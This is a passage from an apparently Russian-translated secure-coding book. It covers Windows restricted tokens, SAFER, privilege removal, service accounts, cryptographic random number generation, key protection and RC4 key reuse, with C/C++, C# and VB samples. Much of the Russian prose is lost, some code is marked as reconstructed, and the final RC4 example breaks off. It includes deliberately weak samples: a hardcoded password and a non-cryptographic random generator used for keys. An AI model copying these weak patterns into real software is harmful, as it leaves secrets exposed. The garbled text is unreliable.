                             TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
                             TOKEN_QUERY | TOKEN_IMPERSONATE,
                             TRUE,
                             &hToken))
            throw GetLastError();
        // Strip every privilege except SeChangeNotifyPrivilege;
        // no SIDs are disabled or restricted.
        if (!CreateRestrictedToken(hToken,
                                   DISABLE_MAX_PRIVILEGE,
                                   0, NULL,
                                   0, NULL,
                                   0, NULL,
                                   &hNewToken))
            throw GetLastError();
        if (!SetThreadToken(&hThread, hNewToken))
            throw GetLastError();
        // DoThreadWork runs under the restricted token.
        DoThreadWork(hNewToken);
    } catch (DWORD d) {
        dwErr = d;
    }
    if (hNewToken)
        CloseHandle(hNewToken);
    if (hToken)
        CloseHandle(hToken);
    if (dwErr == 0)
        RevertToSelf();
    return dwErr;
}

int main() {
    HANDLE h = CreateThread(NULL, 0,
                            ThreadFunc,
                            NULL, CREATE_SUSPENDED, NULL);
    if (h) {
        ResumeThread(h);
        WaitForSingleObject(h, INFINITE);
        CloseHandle(h);
    }
    return 0;
}
Windows XP
Windows XP Software Restriction
Policies ( ), SAFER,
.
SAFER, .
SAFER
Windows XP, Software Restriction Policies (
).
SAFER ( Winsafer.h),
. SaferComputeTokenFromLevel. , ,
.
NormalUser, , Administrators
(), Power Users ( ).
Secureco2\Chapter07. MyToken.cpp SID .
/*
    SAFER.cpp
*/
#include <windows.h>
#include <WinSafer.h>
#include <winnt.h>
#include <stdio.h>
#include <strsafe.h>

int main() {
    SAFER_LEVEL_HANDLE hAuthzLevel;

    // SAFER levels:
    //   SAFER_LEVELID_FULLYTRUSTED  (fully trusted)
    //   SAFER_LEVELID_NORMALUSER    (normal user)
    //   SAFER_LEVELID_CONSTRAINED   (constrained)
    //   SAFER_LEVELID_UNTRUSTED     (untrusted)
    //   SAFER_LEVELID_DISALLOWED    (disallowed)

    // Create the level object.
    if (SaferCreateLevel(SAFER_SCOPEID_USER,
                         SAFER_LEVELID_NORMALUSER,
                         0, &hAuthzLevel, NULL)) {
        // Compute a restricted token from the level.
        HANDLE hToken = NULL;
        if (SaferComputeTokenFromLevel(
                hAuthzLevel,   // Level handle.
                NULL,          // NULL means the current process token.
                &hToken,       // Receives the new token.
                0,             // No flags.
                NULL)) {       // Reserved.
            // Start a process with the new token.
            // Build the full path to Cmd.exe in the system directory so
            // that a tampered Cmd.exe elsewhere on the path is not picked up.
            char szPath[MAX_PATH+1], szSysDir[MAX_PATH+1];
            if (GetSystemDirectory(szSysDir, sizeof (szSysDir))) {
                StringCbPrintf(szPath,
                               sizeof (szPath),
                               "%s\\cmd.exe",
                               szSysDir);
                STARTUPINFO si;
                ZeroMemory(&si, sizeof(STARTUPINFO));
                si.cb = sizeof(STARTUPINFO);
                si.lpDesktop = NULL;
                PROCESS_INFORMATION pi;
                if (!CreateProcessAsUser(
                        hToken,
                        szPath, NULL,
                        NULL, NULL,
                        FALSE, CREATE_NEW_CONSOLE,
                        NULL, NULL,
                        &si, &pi)) {
                    printf("CreateProcessAsUser (%lu)\n",
                           GetLastError());
                } else {
                    CloseHandle(pi.hThread);
                    CloseHandle(pi.hProcess);
                }
            }
            CloseHandle(hToken);
        }
        SaferCloseLevel(hAuthzLevel);
    }
    return 0;
}
SAFER
. SAFER,
, ,
.
. ,
,
,
SAFER.
Windows Security Push ( Microsoft
, )
Windows .Net Server 2003
. SAFER:
,
. ,
: , .
,
.
.
// RemPriv
#include <windows.h>
#include <stdio.h>

#ifndef SE_PRIVILEGE_REMOVED
#define SE_PRIVILEGE_REMOVED (0x00000004)
#endif

// Removes the named privileges from the current process token.
// Returns GetLastError() as observed after AdjustTokenPrivileges.
DWORD RemovePrivs(LPCTSTR szPrivs[], DWORD cPrivs) {
    HANDLE hProcessToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                          &hProcessToken))
        return GetLastError();

    DWORD cbBuff = sizeof TOKEN_PRIVILEGES +
                   (sizeof LUID_AND_ATTRIBUTES * cPrivs);
    char *pbBuff = new char[cbBuff];
    PTOKEN_PRIVILEGES pTokPrivs = (PTOKEN_PRIVILEGES)pbBuff;

    // Fill the privilege array with the LUIDs, each marked for removal.
    pTokPrivs->PrivilegeCount = cPrivs;
    for (DWORD i = 0; i < cPrivs; i++) {
        LookupPrivilegeValue(NULL, szPrivs[i],
                             &(pTokPrivs->Privileges[i].Luid));
        pTokPrivs->Privileges[i].Attributes = SE_PRIVILEGE_REMOVED;
    }

    // Remove the privileges from the token.
    BOOL fRet = AdjustTokenPrivileges(hProcessToken,
                                      FALSE,
                                      pTokPrivs,
                                      0,
                                      NULL,
                                      NULL);
    DWORD dwErr = GetLastError();
#ifdef _DEBUG
    printf("AdjustTokenPrivileges() -> %d\nGetLastError() -> %lu\n",
           fRet,
           dwErr);
#endif
    if (pbBuff) delete [] pbBuff;
    CloseHandle(hProcessToken);
    return dwErr;
}

int main(int argc, CHAR* argv[]) {
    LPCTSTR szPrivs[] = {SE_TAKE_OWNERSHIP_NAME, SE_DEBUG_NAME};
    if (RemovePrivs(szPrivs,
                    sizeof(szPrivs)/sizeof(szPrivs[0])) == 0) {
        // The privileges are gone and cannot be re-enabled.
    }
    return 0;
}
AdjustTokenPrivileges, ,
SE_PRIVILEGE_REMOVED. :
,
.
,
.
Windows .NET Server 2003 ,
, .
, Windows .NET Server 2003, GetVersionEx .
, Windows .NET Server 2003 LSA (LSASS.EXE)
, :
SeTakeOwnershipPrivilege;
SeCreatePagefilePrivilege;
SeLockMemoryPrivilege;
SeAssignPrimaryTokenPrivilege;
SeIncreaseQuotaPrivilege;
SeIncreaseBasePriorityPrivilege;
SeCreatePermanentPrivilege;
SeSystemEnvironmentPrivilege;
SeUndockPrivilege;
SeLoadDriverPrivilege;
SeProfileSingleProcessPrivilege;
SeManageVolumePrivilege.
Smartcard :
SeSecurityPrivilege;
SeSystemtimePrivilege;
SeDebugPrivilege;
SeShutdownPrivilege;
SeUndockPrivilege.
, ,
SeChangeNotifyPrivilege, NTFS.
:
/*
    JettisonPrivs.cpp
*/
#include <windows.h>

#ifndef SE_PRIVILEGE_REMOVED
# define SE_PRIVILEGE_REMOVED (0x00000004)
#endif

// True when two LUIDs identify the same privilege.
#define SAME_LUID(luid1,luid2) \
    (luid1.LowPart == luid2.LowPart && \
    luid1.HighPart == luid2.HighPart)
DWORD JettisonPrivs() {
DWORD dwError = 0;
VOID* TokenInfo = NULL;
try {
HANDLE hToken = NULL;
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&hToken))
throw GetLastError();
DWORD dwSize=0;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
NULL, 0,
&dwSize)) {
dwError = GetLastError();
if (dwError != ERROR_INSUFFICIENT_BUFFER)
throw dwError;
}
TokenInfo = new char[dwSize];
if (NULL == TokenInfo)
throw ERROR_NOT_ENOUGH_MEMORY;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
TokenInfo, dwSize,
&dwSize))
throw GetLastError();
Windows XP/.NET Server 2003
Windows
, .
,
. (
SeTcbPrivilege, SID SYSTEM SID
), : ,
.
,
. Windows XP
:
(NT AUTHORITY\LocalService);
(NT AUTHORITY\NetworkService).
.
,
.
. , BlakeLaptop
LocalService ,
, (
). , ( )
, .
BlakeLaptop NetworkService,
BLAKELAPTOP$.
: Windows 2000/XP
,
$.
ACL ,
.
. 76 ,
Windows .NET Server 2003.
7-6.
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeMachineAccountPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
, Local System ,
.
?
: NetworkService
, LocalService ,
,
.
! Local System,
,
,
NetworkService LocalService.
Table 7-7.
Privilege                 Value   #define
SeImpersonatePrivilege    29L     SE_IMPERSONATE_NAME
SID :
SYSTEM;
Administrators ();
Service ().
Everyone , Service ,
.
, .
,
.
,
(, RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELEGATE).
(
, RPC_C_IMP_LEVEL_ANONYMOUS RPC_C_IMP_LEVEL_IDENTIFY). ,
, ,
.
, .
,
-
,
.
,
.
,
, , , .
:
Windows 95/98/Me,
Windows NT/2000/XP,
;
, ,
.
. Microsoft Windows XP
, ,
,
. ,
ACL ,
Windows XP, Windows 95/98/Me (
).
,
,
.
, Windows 95/98/Me,
Windows NT/2000/XP.
,
. , ,
, . ,
, ,
. , , ,
.
.
Unable to load (
), ,
. ,
. :
Windows Me, Windows XP
. ,
, ,
, !
C:\Program Files.
,
, .
! ,
.
.
,
:
Event Viewer ( );
RegMon ( http://www.sysinternals.com);
FileMon ( http://www.sysinternals.com).
Windows
,
.
.
,
, . ,
, . Windows 2000/XP
.
1. Mmc.exe.
2. Console1 (1) File (),
Add/Remove Snapin ( ).
3. Add/Remove Snapin ( )
Add () Add Standalone Snapin (
).
4. Group Policy ( ) Add
().
5. Select Group Policy Object ( )
Finish (). Select Group Policy Object (
) Local Computer (
).
Event Type:        Failure Audit
Event Source:      Security
Event Category:    Privilege Use
Event ID:          578
Date:              5/21/2002
Time:              10:15:00 AM
User:              NORTHWINDTRADERS\blake
Computer:          CHERYL-LAP
Description:
Privileged object operation:
    Object Server:      Security
    Object Handle:      0
    Process ID:         444
    Primary User Name:  BLAKE-LAP$
    Primary Domain:     NORTHWINDTRADERS
    Primary Logon ID:   (0x0,0x3E7)
    Client User Name:   blake
    Client Domain:      NORTHWINDTRADERS
    Client Logon ID:    (0x0,0x485A5)
    Privileges:         SeShutdownPrivilege
Blake ,
. ,
.
Regmon FileMon
.
: RegMon FileMon. http://www.sysinternals.com.
ACCDENIED
, ,
,
.
FAT FAT32
.
NTFS, FAT,
, . FileMon
, . ,
FAT? , GetFileSecurity SetFileSecurity
FAT, . ,
, FAT.
RegMon FileMon
. ,
, .
. 73, 74 75 (. 219221) ,
,
.
!
.
SYS
TEM . ,
?
.
. : , .
,
, , .
,
.
SYSTEM .
, :
,
, ,
.
,
.
: ,
,
.
.
,
. 7-4
(-
)
. 73. ,
RegMon
RegMon
:
,
ACL
.
RegMon
RegMon
RegMon
?
Full Control
Everyone
. 7-5
(-
)
. 74. ,
NTFS?
, ,
?
:
FileMon
FileMon
:
,
ACL
.
FileMon
FileMon
?
Full Control Everyone
,
,
,
?
,
?
. 75. ,
: ,
. :
, ,
, . ,
. , !
, .
,
,
.
,
,
, ,
.
,
.
, ,
.
: .
, (nonce)
.
.
, .
, ,
, .
,
.
rand
C++,
rand C. ,
C .
rand ,
. rand Rand.c
Microsoft Visual C++ 7 (C Runtime, CRT), (
):
. .
VBScript
73 22 29 92 19 89 43 29 99 95
: VBScript.
Randomize 4269
For i = 0 to 9
r = Int(100 * Rnd) + 1
WScript.echo(r)
Next
// C/C++
// 52 4 26 66 26 62 2 76 67 66
#include <stdio.h>
#include <stdlib.h>
int main() {
    srand(12366);
    for (int i = 0; i < 10; i++) {
        int r = rand() % 100;   // reduce rand() to the range 0..99
        printf("%d ", r);
    }
    return 0;
}
# Perl 5
# 86 39 24 33 80 85 92 64 27 82
srand 650903;
for (1 .. 10) {
$r = int rand 100;
printf "$r ";
}
// C#
// 39 89 31 94 33 94 80 52 64 31
using System;
class RandTest {
static void Main() {
Random rnd = new Random(1234);
for (int i = 0; i < 10; i++) {
Console.WriteLine(rnd.Next(100));
}
}
}
, . (, ,
,
.)
! ,
CRT rand, , .
,
.
, ,
, Netscape Navigator.
: ,
SSL (Secure Sockets Layer),
, SSL.
, !
BugTraq http://online.securityfocus.com/archive/1/3791.
. , IP
CodeRed .
IP. ,
, , ,
! Web http://www.avp.ch/avpve/worms/iis/bady.stm.
Texas Hold Em Poker ASF Software.
Reliable Software Technologies ( Cigital http://www.cigital.com)
1999 .
Borland Delphi
, rand CRT. Exploit ,
! Web
http://www.cigital.com/news/gambling.html.
Win32
: rand,
Windows,
CryptGenRandom,
.
WinCrypt.h Windows
, Windows 95 Internet Explorer 3.02
, Windows 98, Windows Me, Windows CE v3, Windows NT 4/2000/XP Win
dows .NET Server 2003.
CryptGenRandom
. 81.
, , ,
, FIPS 1862, 3.1, SHA1,
G.
CryptGenRandom [
(system entropy)], Windows 2000
, :
(GetCurrentProcessID);
(GetCurrentThreadID);
(GetTickCount);
(GetLocalTime);
CryptGenRandom()
FIPS 186
,
SHA-1
NewGenRandom()
64
RC4
MD4
SHA-1 x 4
RC4
HKLM/Software/Microsoft/
Cryptography/RNG/Seed
. 81.
Windows 2000 .
,
(Query
PerformanceCounter);
MD4 ,
, . MD4 ,
128
;
, RDTSC,
RDMSR, RDPMC ( x86
Web http://developer.intel.com/software/idap/resources/technical_collateral/pentiumii/RDTSCPM1.HTM);
,
: Idle Process Time, Io Read Transfer Count, I/O Write Transfer Count, I/O Other
Transfer Count, I/O Read Operation Count, I/O Write Operation Count, I/O Other
Operation Count, Available Pages, Committed Pages, Commit Limit, Peak Commitment, Page Fault Count, Copy On Write Count, Transition Count, Cache Transition
Count, Demand Zero Count, Page Read Count, Page Read I/O Count, Cache Read
Count, Cache I/O Count, Dirty Pages Write Count, Dirty Write I/O Count, Mapped
Pages Write Count, Mapped Write I/O Count, Paged Pool Pages, Non Paged Pool Pages,
Paged Pool Allocated space, Paged Pool Free Space, Non Paged Pool Allocated Space,
Non Paged Pool Free Space, Free System Page Table Entry, Resident System Code
Page, Total System Driver Pages, Total System Code Pages, Non Paged Pool Lookaside
Hits, Paged Pool Lookaside Hits, Available Paged Pool Pages, Resident System Cache
Page, Resident Paged Pool Page, Resident System Driver Page, Cache/Fast Read with
No Wait, Cache/Fast Read with Wait, Cache/Fast Read Resource Missed, Cache/Fast
Read Not Possible, Cache/Fast Memory Descriptor List Read with No Wait, Cache/
Fast Memory Descriptor List Read with Wait, Cache/Fast Memory Descriptor List Read
Resource Missed, Cache/Fast Memory Descriptor List Read Not Possible, Cache/Map
Data with No Wait, Cache/Map Data with Wait, Cache/Map Data with No Wait Miss,
Cache/Map Data Wait Miss, Cache/PinMapped Data Count, Cache/PinRead with
No Wait, Cache/Pin Read with Wait, Cache/PinRead with No Wait Miss, Cache/Pin
Read Wait Miss, Cache/CopyRead with No Wait, Cache/CopyRead with Wait, Cache/
CopyRead with No Wait Miss, Cache/CopyRead with Wait Miss, Cache/Memory
Descriptor List Read with No Wait, Cache/Memory Descriptor List Read with Wait,
Cache/Memory Descriptor List Read with No Wait Miss, Cache/Memory Descriptor
List Read with Wait Miss, Cache/Read Ahead IOs, Cache/LazyWrite IOs, Cache/Lazy
Write Pages, Cache/Data Flushes, Cache/Data Pages, Context Switches, First Level
Translation Buffer Fills, Second Level Translation buffer Fills System Calls;
, :
Alignment Fix Up Count, Exception Dispatch Count, Floating Emulation Count
Byte Word Emulation Count;
, , : Current
Depth, Maximum Depth, Total Allocates, Allocate Misses, Total Frees, Free Misses,
Type, Tag Size;
, :
Context Switches, Deferred Procedure Call Count, Deferred Procedure Call Rate, Time
Increment, Deferred Procedure Call Bypass Count Asynchronous Procedure Call
Bypass Count;
, : Next
Entry Offset, Number Of Threads, Create Time, User Time, Kernel Time, Image Name,
Base Priority, Unique Process ID, Inherited from Unique Process ID, Handle Count,
Session ID, Page Directory Base, Peak Virtual Size, Virtual Size, Page Fault Count,
Peak Working Set Size, Working Set Size, Quota Peak Paged Pool Usage, Quota Paged
Pool Usage, Quota Peak Non Paged Pool Usage, Quota Non Paged Pool Usage, Page
file Usage, Peak Page file Usage, Private Page Count, Read Operation Count, Write
Operation Count, Other Operation Count, Read Transfer Count, Write Transfer Count
Other Transfer Count.
SHA1, 20
(seed value),
FIPS 1862, 3.1.
,
(
CryptGenRandom Platform SDK). ,
,
, .
CryptGenRandom :
#include <windows.h>
#include <wincrypt.h>
...
HCRYPTPROV hProv = NULL;
BOOL fRet = FALSE;
BYTE pGoop[16];
DWORD cbGoop = sizeof pGoop;
if (CryptAcquireContext(&hProv,
                        NULL, NULL,
                        PROV_RSA_FULL,
                        CRYPT_VERIFYCONTEXT))
    // pGoop is an array and already decays to BYTE*; &pGoop would be BYTE(*)[16].
    if (CryptGenRandom(hProv, cbGoop, pGoop))
        fRet = TRUE;
if (hProv) CryptReleaseContext(hProv, 0);
C++ CCryptRandom ,
CryptAcquireContext ( ) CryptReleaseContext,
(Cryptographic Service Provider, CSP),
. , CCryptRandom,
.
/*
  CryptRandom.cpp
*/
#include <windows.h>
#include <wincrypt.h>
#include <iostream>
using namespace std;

class CCryptRandom {
public:
    CCryptRandom();
    virtual ~CCryptRandom();
    BOOL get(void *lpGoop, DWORD cbGoop);
private:
    HCRYPTPROV m_hProv;
};

CCryptRandom::CCryptRandom() {
    m_hProv = NULL;
    // Acquire a CSP context once; it is released in the destructor.
    if (!CryptAcquireContext(&m_hProv,
                             NULL, NULL,
                             PROV_RSA_FULL, CRYPT_VERIFYCONTEXT) ||
        m_hProv == NULL)
        throw GetLastError();
}

CCryptRandom::~CCryptRandom() {
    if (m_hProv) CryptReleaseContext(m_hProv, 0);
}

BOOL CCryptRandom::get(void *lpGoop, DWORD cbGoop) {
    if (!m_hProv) return FALSE;
    return CryptGenRandom(m_hProv, cbGoop,
                          reinterpret_cast<LPBYTE>(lpGoop));
}

int main() {
    try {
        CCryptRandom r;
        // Print 10 numbers in the range 0..99.
        // (d % 100 is slightly biased; fine for a demo, not for key material.)
        for (int i = 0; i < 10; i++) {
            DWORD d;
            if (r.get(&d, sizeof d))
                cout << d % 100 << endl;
        }
    } catch (...) {
        // Could not acquire a CSP context.
    }
    return 0;
}
Secureco2\Chapter08.
, CryptGenRandom,
, !
Crypt
AcquireContext,
, .
FIPS 140-1
FIPS 1401 (Federal Infor
mation Processing Standard)
.
. FIPS 1401 Web http://www.microsoft.com/technet/security/FIPSFaq.asp.
, ,
, FIPS 1401.
, rand . CryptGenRandom
Windows 2000 FIPS.
, , ,
, rand C:
// .
byte[] key = new byte[32];
new Random().NextBytes(key);
, C#, 32
:
using System;
using System.Security.Cryptography;
try {
    byte[] b = new byte[32];
    new RNGCryptoServiceProvider().GetBytes(b);
    // Print the 32 random bytes in hex.
    for (int i = 0; i < b.Length; i++)
        Console.Write("{0} ", b[i].ToString("x"));
} catch (CryptographicException e) {
    Console.WriteLine(e.Message);
}
RNGCryptoServiceProvider CryptoAPI, Crypt
GenRandom, . Visual Ba
sic .NET :
Imports System
Imports System.Security.Cryptography
' VB array bounds are inclusive: b(31) holds the 32 bytes requested.
Dim b(31) As Byte
Dim i As Short
Try
    Dim r As New RNGCryptoServiceProvider()
    r.GetBytes(b)
    For i = 0 To b.Length - 1
        Console.Write("{0} ", b(i).ToString("x"))
    Next
Catch e As CryptographicException
    Console.WriteLine(e.Message)
End Try
Web-
ASP.NET ,
, . COM
Web GetRandom Utilities
CAPICOM v2. ,
ASP, VBScript (Visual Basic Scrip
ting Edition):
<%
    set oCC = CreateObject("CAPICOM.Utilities.1")
    strRand = oCC.GetRandom(32, -1)
    ' strRand now holds 32 random bytes, Base64-encoded.
%>
: GetRandom CAPICOM 2, 1
. CAPICOM : http://www.microsoft.com/downloads/release.asp?ReleaseID=39546.
, ,
.
, ,
,
. ,
DES (Data Encryption Standard), 56 .
DES
0 2561 ( 0 72 057 594 037 927 899).
ASCII, AZ, az, 09,
,
.
, DES ,
, 0 2561.
,
ASCII, .
, Perl. 2001 .
Fun With Perl (http://www.technofile.org/depts/mlists/fwp.html) ,
. :
(Claude Shannon),
1948 . (A Mathematical
Theory of Communication), .
, ,
log2(nm), n
, m . VBScript ,
:
#include <math.h>
#include <stdio.h>

// Bits of entropy in a password of `size` characters, each drawn uniformly
// from an alphabet of `valid` symbols: log2(valid^size) = size * log2(valid).
double EntropyBits(double valid, double size) {
    return valid ? size * log(valid) / log(2) : 0;
}

int main() {
    printf("%f\n", EntropyBits(62, 8));
    return 0;
}
!
, ,
. , (Major),
Maj0r, ,
.
(social engineering).
, ,
.
, PIN 24601,
, .
, . ,
DES 56
. . 81,
,
56 128 .
Table 8-1.
Alphabet                    56-bit key    128-bit key
PIN: 10 (0-9)               17            40
26 (A-Z or a-z)             12            28
52 (A-Z and a-z)            10            23
52 (A-Z, a-z and 0-9)       10            22
                                          20
,
, ,
(. 82).
. 82.
! ,
.
, ,
.
http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/tr500.pdf,
The Memorability and Security of Passwords Some Empirical
Results (
).
,
.
, ,
.
. ,
,
.
DVD:
, exploit,
, DVD Xing
DVD Player RealNetworks Inc, Xing Technologies.
DVD ,
DeCSS,
DVD. http://www.cnn.com/TECH/computing/9911/05/dvd.hack.idg.
This1sAPa$sword, ,
,
( Strings), EXE DLL
.
. : .
, :
// !!!! .
char *szPassword="&162hV1);sWa1";
, ,
? Strings ,
ASCII. !
. ,
, .
nCipher (http://
www.ncipher.com).
.
, , ,
SSL/TLS. !
Playing Hide and Seek with Stored Keys ( ) http://www.ncipher.com/products/rscs/downloads/whitepapers/keyhide2.pdf. nCipher
, .
9.
! ,
(RC) .
. , ,
.
: .
, (ephemeral),
, IPSec, SSL/TLS, RPC DCOM.
.
,
(nonrepudiation),
. , SSL/TLS
. ,
, .
,
,
, . ,
.
, .
.
, , .
. ,
DES RC4, . RSA (
), ,
.
(factoring). ,
112 3DES , 512 RSA,
. ,
, 112
3DES.
Cryptographic Challenges (
) Web http://www.rsasecurity.com/rsalabs/challenges.
DES RSA
.
, ,
, .
Table 8-2.
Symmetric key (bits)    RSA and DSA key (bits)    Elliptic-curve key (bits)
70                      947                       128
80                      1228                      145
90                      1553                      153
100                     1926                      184
150                     4575                      279
200                     8719                      373
250                     14596                     475
, 80 RSA
1228 . ,
RSA, 80 .
! 128 AES 512 RSA
.
,
, ,
. :
. :
. : , ,
. , ,
. , ,
, ,
(. 83).
. 83
, . GetKey
EncryptWithKey, Encrypt, DoWork Encrypt
Data. ,
.
. GetKeyHandle
(handle) , EncryptData.
.
, .
D.EXE
D.EXE
szKey = GetKey("MyKey");
C.EXE
hKey = GetKey("MyKey");
C.EXE
EncryptWithKey(szKey);
B.DLL
EncryptWithKeyHandle(hKey);
B.DLL
Encrypt(szKey);
A.DLL
Encrypt(hKey);
A.DLL
DoWork(szKey);
DoWork(hKey);
EncryptData(szKey);
EncryptData(hKey);
. 83. ,
! , ,
, ,
.
CryptGenKey CryptExportKey
Microsoft CryptoAPI CryptGenKey,
,
.
CryptoAPI, .
,
, CryptExportKey
CryptImportKey.
( ),
( Windows 2000 ).
(plaintext), . .
. CryptoAPI,
.
C++, ,
:
/*
  ProtectKey.cpp
*/
#include "stdafx.h"
#include <windows.h>
#include <wincrypt.h>
#include <iostream>
#include <fstream>
using namespace std;

// Fetches the key-encrypting key material from storage.
// Not part of the listing: assumed to be supplied by the application.
BOOL GetKeyFromStorage(BYTE *pbKey, DWORD cbKey);

// Derive the 3DES exchange (wrapping) key from the stored key material.
void GetExchangeKey(HCRYPTPROV hProv, HCRYPTKEY *hXKey) {
    HCRYPTHASH hHash = NULL;
    BYTE bKey[16];
    if (!GetKeyFromStorage(bKey, sizeof bKey))
        throw GetLastError();
    if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
        throw GetLastError();
    if (!CryptHashData(hHash, bKey, sizeof bKey, 0))
        throw GetLastError();
    if (!CryptDeriveKey(hProv, CALG_3DES, hHash, CRYPT_EXPORTABLE, hXKey))
        throw GetLastError();
    CryptDestroyHash(hHash);
    SecureZeroMemory(bKey, sizeof bKey);   // the raw key material is no longer needed
}

int main() {
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY  hKey = NULL;
    HCRYPTKEY  hExchangeKey = NULL;
    LPBYTE     pbKey = NULL;
    try {
        if (!CryptAcquireContext(&hProv, NULL, NULL,
                                 PROV_RSA_FULL,
                                 CRYPT_VERIFYCONTEXT))
            throw GetLastError();
        // Generate the 3DES session key. Its plaintext never leaves the CSP.
        if (!CryptGenKey(hProv, CALG_3DES, CRYPT_EXPORTABLE, &hKey))
            throw GetLastError();
        // Get the exchange key that will wrap the 3DES key.
        GetExchangeKey(hProv, &hExchangeKey);
        // First call: find out how large the key BLOB is.
        DWORD dwLen = 0;
        if (!CryptExportKey(hKey, hExchangeKey,
                            SYMMETRICWRAPKEYBLOB,
                            0, NULL, &dwLen))
            throw GetLastError();
        pbKey = new BYTE[dwLen];   // buffer for the wrapped 3DES key
        if (!pbKey) throw (DWORD)ERROR_NOT_ENOUGH_MEMORY;
        ZeroMemory(pbKey, dwLen);
        // Second call: export the wrapped key.
        if (!CryptExportKey(hKey, hExchangeKey,
                            SYMMETRICWRAPKEYBLOB, 0, pbKey, &dwLen))
            throw GetLastError();
        cout << "Wrapped key BLOB: " << dwLen
             << " bytes."
             << endl;
        // Write the BLOB to key.bin with ostream::write(), not operator<<,
        // because the BLOB may contain NUL bytes.
        ofstream file("c:\\keys\\key.bin", ios_base::binary);
        file.write(reinterpret_cast<const char *>(pbKey), dwLen);
        file.close();
    } catch (DWORD e) {
        cerr << "Error " << e << " (0x" << hex << e << ")" << endl;
    }
    // Clean up.
    if (hExchangeKey) CryptDestroyKey(hExchangeKey);
    if (hKey)         CryptDestroyKey(hKey);
    if (hProv)        CryptReleaseContext(hProv, 0);
    if (pbKey)        delete [] pbKey;
    return 0;
}
Secureco2\Chapter08. ,
GetExchangeKey ,
.
, , !
3DES. 3DES ,
. , DES.
. ,
,
. ,
,
. ,
(spoofing),
. :
, ,
.
,
.
! ,
( !). :
? ,
, .
, .
,
. , ,
( , ),
( 9).
( ,
, , )* .
, , .
,
, .
IPSec Windows 2000 . . 84
,
.
. 84.
,
, ,
sneakernet, sneaker net . . .
, , ,
. ,
, . , SSL/TLS IPSec
.
, .
: ,
,
(Diffie Hellman) RSA.
. ,
, .
, : ,
. !
, ,
, , .
,
. , :
,
.
XOR
, XOR, .
( )
:
A B A = B
. XOR ,
. XOR
, .
, !
JScript, CAPICOM,
, .
var CAPICOM_ENCRYPTION_ALGORITHM_RC2  = 0;
var CAPICOM_ENCRYPTION_ALGORITHM_RC4  = 1;
var CAPICOM_ENCRYPTION_ALGORITHM_DES  = 2;
var CAPICOM_ENCRYPTION_ALGORITHM_3DES = 3;
. DLL
Web http://www.microsoft.com/downloads/release.asp?releaseid=39546.
!
. , .
Win32 CryptoAPI,
(VBScript, JScript ASP) CAPICOM. .NET
( ASP.NET)
System.Security.Cryptography.
.
. 256
, ,
, ?
, . ,
256 , ?
? ,
. ,
, , .
,
.
(stream cipher)
, 1 . (RC4
.
, ,
CryptoAPI Windows.) , ,
,
. ,
;
. XOR
, .
: XOR
.
, .
(, RSA), ,
. : DES, 3DES, AES (Advan
ced Encryption Standard, DES), IDEA [ Pretty Good
,
. , 13 , 13
. DES, 64 , 13
16 . 3
, DES 64 .
, 13 DES ,
5 3 ( , ),
8 .
, , ,
, !
.
RC4 10 DES.
, .
.
,
.
, , .
,
.
,
. ,
.
.
,
XOR . ,
, . , , .
: ,
. , 23
, 23 .
, ,
CryptoAPI:
/*
  RC4Test.cpp
*/
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#include <string.h>

#define MAX_BLOB 50
BYTE bPlainText1[MAX_BLOB];
BYTE bPlainText2[MAX_BLOB];
BYTE bCipherText1[MAX_BLOB];
BYTE bCipherText2[MAX_BLOB];
BYTE bKeyStream[MAX_BLOB];
BYTE bKey[MAX_BLOB];

// Supplies the key; assumed external helper, not on the page.
const char *GetKeyFromUser();

//////////////////////////////////////////////////////////////////
// Fill the two plaintext buffers and the key.
// Both messages are later encrypted with the same key.
void Setup() {
    ZeroMemory(bPlainText1, MAX_BLOB);
    ZeroMemory(bPlainText2, MAX_BLOB);
    ZeroMemory(bCipherText1, MAX_BLOB);
    ZeroMemory(bCipherText2, MAX_BLOB);
    ZeroMemory(bKeyStream, MAX_BLOB);
    ZeroMemory(bKey, MAX_BLOB);
    // Constructed stand-ins for the book's sample strings,
    // which did not survive extraction.
    strncpy(reinterpret_cast<char*>(bPlainText1),
            "Meet me at the usual place at 6.", MAX_BLOB-1);
    strncpy(reinterpret_cast<char*>(bPlainText2),
            "The second message is secret.", MAX_BLOB-1);
    strncpy(reinterpret_cast<char*>(bKey),
            GetKeyFromUser(), MAX_BLOB-1);
    // The buffers were zeroed first, so every string is null-terminated.
}

//////////////////////////////////////////////////////////////////
// Encrypt: RC4-encrypts bPlaintext into bCipherText with a key derived from bKey.
void Encrypt(LPBYTE bKey,
             LPBYTE bPlaintext,
             LPBYTE bCipherText,
             DWORD dwHowMuch) {
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY  hKey = NULL;
    HCRYPTHASH hHash = NULL;
    /*
      Steps:
      1. Acquire a CSP context.
      2. Create a hash object and hash the key material.
      3. Derive an RC4 key from that hash.
      4. Encrypt the buffer in place.
    */
    DWORD dwBuff = dwHowMuch;
    CopyMemory(bCipherText, bPlaintext, dwHowMuch);
    if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL,
                             CRYPT_VERIFYCONTEXT))
        throw GetLastError();
    // The rest of this function is not on the page; the calls below are the
    // standard CryptoAPI sequence for steps 2-4 and should be read as assumed.
